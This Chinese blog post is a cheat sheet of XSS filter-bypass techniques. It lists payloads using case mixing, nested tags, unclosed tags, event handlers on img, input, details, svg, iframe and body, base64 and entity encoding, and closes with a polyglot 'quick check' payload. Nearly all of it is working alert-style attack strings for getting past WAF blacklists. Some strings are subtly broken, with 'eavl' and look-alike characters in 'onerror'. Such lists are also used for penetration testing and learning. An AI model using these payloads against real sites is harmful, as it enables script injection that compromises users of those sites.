XSS常见的绕过手法
大小写绕过
HTML对标签大小写不敏感,可以利用大小写混用绕过
例如:<script>改为<ScRiPt>
双写绕过
有些情况的规则会将黑名单标签替换为空,可以利用这一点构造标签
例如:<script>改为<scr<script>ipt>
同理某些注释符在规则中也会替换为空,这时候可以利用它构造payload
例如:<script>改为<scr<!---test--->ipt>
开口标签
在某些特殊环境,由于html代码补全机制,可以故意不闭合标签绕过黑名单检测
例如:<script>改为<script
空格回车TAB
例如:js伪协议javascript:alert('xss');可以改为java script:alert('xss');等
其他非黑名单标签和事件
<img>
payload:<img src=1 οnerrοr=alert("xss");>
<input>
payload: <input onfocus="alert('xss');">
<input οnblur=alert("xss") autofocus><input autofocus> #竞争焦点,触发onblur事件
<input onfocus="alert('xss');" autofocus> #通过autofocus属性执行本身的focus事件
<details>
payload: <details ontoggle="alert('xss');">
<details open ontoggle="alert('xss');"> #使用open属性触发ontoggle事件
<svg>
payload: <svg οnlοad=alert("xss");>
<iframe>
payload: <iframe οnlοad=alert("xss");></iframe>
<body>
payload: <body/οnlοad=alert("xss");>
编码转义
base64编码
payload: <script>eavl(atob("PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="));</script> #eval()用于将字符串当作程序执行,atob()用于解密base64
<a href="data:text/html;base64",PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">1</a>
JS编码
Uncode编码
\u00+16进制
JS环境中,利用String.fromCharCode函数将 Unicode 编码转为字符
16进制
\x+16进制
html实体编码
&#+10进制/16进制+;
一些特殊过滤情况
用/代替空格
用反引号代替括号、双引号
用throw代替括号
用html实体编码:代替冒号
用jsfuck编码绕过大部分字符过滤
……
一些思维导图
总结
一般xss的防护手段主要是过滤或转义敏感字符、标签,针对不同情况看人下菜,首先可以利用常见payload或枚举一些敏感字符、标签,查看是否有waf以及拦截情况去猜测规则对哪些输入做了限制,对不同的限制利用不同的方式进行绕过。
一些参考链接
https://www.cnblogs.com/sfsec/archive/2021/08/23/15178028.html
https://www.fujieace.com/penetration-test/xss-100.html
强防御下的XSS绕过思路
快速检查payload:
‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;
alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–
></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
”;!–”<XSS>=&{()}
1542
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
